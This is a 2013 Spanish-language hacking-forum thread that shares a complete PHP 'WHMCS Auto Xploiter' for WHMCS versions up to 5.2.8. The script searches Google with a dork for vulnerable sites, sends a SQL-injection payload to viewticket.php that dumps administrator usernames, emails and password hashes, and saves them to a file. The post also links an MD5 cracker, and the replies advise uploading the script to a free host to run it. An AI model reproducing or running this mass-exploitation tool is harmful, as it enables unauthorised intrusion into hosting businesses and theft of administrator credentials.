Indetectables

Publicado: **23 Oct 2013, 20:08**

Este es un Exploit que se esta liberando ya en foros árabes,la ultima versión es vulnerable y están todos sin fixear, básicamente introduces un Dork para WHCMS, y el Exploit se encarga de buscar los vulnerables y explotarlos automáticamente por SQLi.

Codigo PHP:

Mostrar/Ocultar

Código: Seleccionar todo

<?php

set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy()
{
    ob_flush();
    flush();
}
function getAlexa($url)
{
    $xml   = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url=' . $url);
    $rank1 = $xml->SD[1];
    if ($rank1)
        $rank = $rank1->POPULARITY->attributes()->TEXT;
    else
        $rank = 0;
    return $rank;
}

function google_that($query, $page = 1)
{
    $resultPerPage    = 8;
    $start            = $page * $resultPerPage;
    $url              = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
    $resultFromGoogle = json_decode(http_get($url, true), true);
    if (isset($resultFromGoogle['responseStatus'])) {
        if ($resultFromGoogle['responseStatus'] != '200')
            return false;
        if (sizeof($resultFromGoogle['responseData']['results']) == 0)
            return false;
        else
            return $resultFromGoogle['responseData']['results'];
    } else
        die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url);
}

function http_get($url, $safemode = false)
{
    if ($safemode === true)
        sleep(1);
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close();
}

function check_vuln($url)
{
    $url = dirname($url) . '/viewticket.php';
    $url = str_replace("/admin", "", $url);
    
    $post            = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
    $curl_connection = curl_init($url);
    if ($curl_connection != false) {
        curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
        curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
        curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
        $source = curl_exec($curl_connection);
        preg_match_all('/:::::(.*?):::::/s', $source, $infoz);
        if ($infoz[0]) {
            return $infoz[0];
        } else
            return "Fail!";
    } else
        return "Fail!";
}
?>
<html>
<head>
<title>WHMCS Auto Xploiter - by g00n</title>
</head>
<body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
 
<STYLE>
textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border  : dashed 1px;
border-color: #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:#DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border  : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin  : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}
 
A:link {
COLOR: White; TEXT-DECORATION: none
}
A:visited {
COLOR: White; TEXT-DECORATION: none
}
A:hover {
color: Red; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}
 
#result{margin:10px;}
#result span{display:block;}
#result .Y{background-color:green;}
#result .X{background-color:red;}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
show_div(id);
  else
hide_div(id);
}
</script>
</td></table></tr>
<br>
<br>
<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
<style>
  body {
font-family: 'Audiowide', serif;
font-size: 30px;
   
  }
</style>
  </head>
 
  <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
<center>
<font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
<br>
<font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
</font>
<br><br>
 
<table border=1 bordercolor=red>
<tr>
<td width="700">
<br />
<center>
<form method="post">
Google Dork: &nbsp;&nbsp;
<input type="text" id="dork" size="30" name="dork" value="<?php
echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php';
?>" />
&nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/>
</form>
<?php
if (isset($_POST['dork']{0})) {
    $file = fopen("WMCS-Hashes.txt", "a");
    echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';
    letItBy();
    for ($googlePage = 1; $googlePage <= 50; $googlePage++) {
        $googleResult = google_that($_POST['dork'], $googlePage);
        if (!$googleResult) {
            echo 'Finished scanning.';
            fclose($file);
            break;
        }
        
        for ($victim = 0; $victim < sizeof($googleResult); $victim++) {
            $result = check_vuln($googleResult[$victim]['unescapedUrl']);
            $alexa  = getAlexa($googleResult[$victim]['unescapedUrl']);
            if ($result != "Fail!") {
                $hashes = "";
                foreach ($result as $record) {
                    $hashes = $hashes . str_replace(':::::', '', $record) . "\n";
                }
                $sep  = "========================================================\n";
                $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " . $alexa . "\n" . $sep . $hashes . "\n";
                fwrite($file, $data);
                echo "<br /><font color=\"green\">Successfully Xploited...</font>";
                echo '<span class="Y">';
                echo "<pre>" . $data . "</pre></span><br />";
                
            } else {
                echo '<span class="X">';
                echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
                echo "</span>\n<br />";
            }
            letItBy();
        }
    }
    echo '</div>';
}
?>
</center>
</td>
</table>
<br /><br />
 
 
</center>
</body>
</html>

MD5 Cracker:
[Enlace externo eliminado para invitados]

//Regards.

Publicado: **23 Oct 2013, 22:40**

Siendo arabe es de cuidado, y nada que una virtual no pueda remediar, gracias compañero.

Publicado: **24 Oct 2013, 09:13**

Muy pero que muy buena informacion Scorpo

Publicado: **24 Oct 2013, 11:25**

Leizerbick escribió:Siendo arabe es de cuidado, y nada que una virtual no pueda remediar, gracias compañero.

Creo que andas un poco perdido compañero, eso es un script PHP para vulnerar el sistema de WHMCS, no lo ejecutas en virtual ni nada de eso.. simplemente lo subes a cualquier free host a dejar volar la imaginación.

Publicado: **12 Nov 2013, 23:17**

Parse error: parse error, unexpected T_OBJECT_OPERATOR in ** on line 16
solucion?
y gracias ^^

Publicado: **13 Nov 2013, 00:03**

Gracias Capo

por la informacion

Indetectables

Exploit 0day WHCMS <= 5.2.8

Exploit 0day WHCMS <= 5.2.8

Re: Exploit 0day WHCMS <= 5.2.8

Re: Exploit 0day WHCMS <= 5.2.8

Re: Exploit 0day WHCMS <= 5.2.8

Re: Exploit 0day WHCMS <= 5.2.8

Re: Exploit 0day WHCMS <= 5.2.8